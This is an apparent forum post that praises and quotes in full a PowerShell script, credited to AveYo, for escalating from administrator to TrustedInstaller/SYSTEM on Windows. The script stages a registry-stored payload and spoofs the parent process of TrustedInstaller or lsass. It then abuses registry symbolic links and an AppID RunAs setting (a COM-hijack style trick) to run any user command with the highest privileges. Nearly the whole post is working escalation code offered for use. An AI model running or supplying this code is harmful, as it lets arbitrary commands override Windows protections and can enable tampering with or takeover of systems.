Any one was look in aveyo script's lately actualy its very smart script. it make payload, run payload as administator -> run payload as TI, run user command very smart idea, look like registry / com hijacking and weird, i can say, don't use duplicate token etc etc (like other script's) Code: <# The privilege escalation process is 3 step's operation: * Setup the Payload (and Initial Trigger) * Run Payload Script as Administrator * Run Payload Script as TI/SYSTEM * Start User Command Under TI/SYSTEM Privileges ----> Type OF COM hijacking --> #> function RunAsTI ($cmd) { $id='RunAsTI'; $sid=((whoami /user)-split' ')[-1]; $payload=@' $ti=(whoami /groups)-like"*1-16-16384*"; $DM=[AppDomain]::CurrentDomain."DefineDynamicAssembly"(1,1)."DefineDynamicModule"(1) $D=@(); 0..5|% {$D+=$DM."DefineType"("M$_",1179913,[ValueType])}; $I=[int32]; $P=$I.module.gettype("System.IntPtr"); $U=[uintptr] $D+=$U; 4..6|% {$D+=$D[$_]."MakeByRefType"()}; $M=$I.module.gettype("System.Runtime.InteropServices.Marshal"); $Z=[uintptr]::size $S=[string]; $F="kernel","advapi","advapi",($S,$S,$I,$I,$I,$I,$I,$S,$D[7],$D[8]),($U,$S,$I,$I,$D[9]),($U,$S,$I,$I,[byte[]],$I) 0..2|% {$9=$D[0]."DefinePInvokeMethod"(("CreateProcess","RegOpenKeyEx","RegSetValueEx")[$_],$F[$_]+'32',8214,1,$S,$F[$_+3],1,4)} $DF=0,($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$S,$S,$S,$I,$I,$I,$I,$I,$I,$I,$I,[int16],[int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I) 1..5|% {$k=$_; $n=1; $AveYo=1; $DF[$_]|% {$9=$D[$k]."DefineField"('f'+$n++,$_,6)}}; $T=@(); 0..5|% {$T+=$D[$_]."CreateType"()} 0..5|% {nv "A$_" ([Activator]::CreateInstance($T[$_])) -force}; function F ($1,$2) {$T[0]."GetMethod"($1).invoke(0,$2)}; if ($ti) { $env:A=''; $PRIV=[uri].module.gettype("System.Diagnostics.Process")."GetMethods"(42) |? {$_.Name -eq "SetPrivilege"} "SeSecurityPrivilege","SeTakeOwnershipPrivilege","SeBackupPrivilege","SeRestorePrivilege" |% {$PRIV.Invoke(0, @("$_",2))} $HKU=[uintptr][uint32]2147483651; $LNK=$HKU; $reg=@($HKU,"S-1-5-18",8,2,($LNK -as $D[9])); F "RegOpenKeyEx" $reg; $LNK=$reg[4] function SYM($1,$2){ $b=[Text.Encoding]::Unicode.GetBytes("\Registry\User\$1");@($2,"SymbolicLinkValue",0,6,[byte[]]$b,$b.Length) } F "RegSetValueEx" (SYM $(($key-split'\\')[1]) $LNK); $EXP="HKLM:\Software\Classes\AppID\{CDCBCFCA-3CDC-436f-A4E2-0E02075250C2}" $r="explorer"; if (!$cmd) {$cmd='C:\'}; $dir=test-path -lit ((($cmd -split '^("[^"]+")|^([^\s]+)') -ne'')[0].trim('"')) -type 1 # Start User Command Under TI/SYSTEM Level if (!$dir) {$r="start `"$id`" /high /w"}; sp $EXP RunAs '' -force; start cmd -args ("/q/x/d/r title $id && $r",$cmd) -wait -win 1 do {sleep 7} while ((gwmi win32_process -filter 'name="explorer.exe"'|? {$_.getownersid().sid -eq "S-1-5-18"})) F "RegSetValueEx" (SYM ".Default" $LNK); sp $EXP RunAs "Interactive User" -force } else { $g=0; "TrustedInstaller","lsass"|% {if (!$g) {net1 start $_ 2>&1 >$null; $g=@(get-process -name $_ -ea 0|% {$_})[0]}}; function M($1,$2,$3){$M."GetMethod"($1,[type[]]$2).invoke(0,$3)}; $H=@(); $Z,(4*$Z+16)|% {$H+=M "AllocHGlobal" $I $_}; M "WriteIntPtr" ($P,$P) ($H[0],$g.Handle); $A1.f1=131072; $A1.f2=$Z; $A1.f3=$H[0]; $A2.f1=$A2.f2=$A2.f3=$A2.f4=1; $A2.f6=$A1 $A3.f1=10*$Z+32; $A4.f1=$A3; $A4.f2=$H[1]; M "StructureToPtr" ($D[2],$P,[boolean]) (($A2 -as $D[2]),$A4.f2,$false); $w=0x0E080600 # Run PayLoad script as TI/SYSTEM $out=@($null,"powershell -win 1 -nop -c iex `$env:A",0,0,0,$w,0,$null,$A4,$A5); F "CreateProcess" $out } '@; $key="Registry::HKEY_USERS\$sid\Volatile Environment"; $a1="`$id='$id';`$key='$key';"; $a2="`$cmd='$($cmd-replace"'","''")';" sp $key $id $($a1,$a2,$payload) -type 7 -force; $arg="$a1 `$env:A=(gi `$key).getvalue(`$id)-join''; rp `$key `$id -force; iex `$env:A" # Setup a Payload & RunAs Administrator start powershell -args "-win 1 -nop -c $arg" -verb runas }; RunAsTI "cmd /k whoami";